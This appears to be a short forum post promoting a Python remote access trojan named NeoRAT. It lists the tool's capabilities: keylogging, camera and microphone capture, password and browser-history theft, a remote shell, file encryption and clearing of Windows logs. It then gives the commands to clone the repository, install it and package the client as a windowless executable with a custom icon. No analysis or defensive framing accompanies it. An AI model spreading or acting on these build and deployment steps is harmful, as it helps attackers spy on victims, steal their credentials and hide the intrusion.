RAT functions:
TCP Network Stream (IPv4)
Deflate compression and AES128 encryption
multithreaded
Automatic logging
Stable remote shell
Desktop Stream
Microphone access
Keylogger
Take a screenshot
Camera access
Upload file/download file
File encryption/decryption
Keystroke and mouse injection
Python interpreter (result to server)
Password Recovery
Restoring browser history
Cleaning Windows logs
Accessing the notification window
View open websites
RAT installation:
git clone https://github.com/Wans1e/NeoRAT.git && cd NeoRAT
pip install -r requirements.txt && pipwin install pyaudio
start python server.py && start python client.py
RAT execution:
[color=rgb(235, 107, 86)]pyinstaller -F -i [path to .ico file] server.py
pyinstaller -F -w -i [path to .ico file] client.py[/color]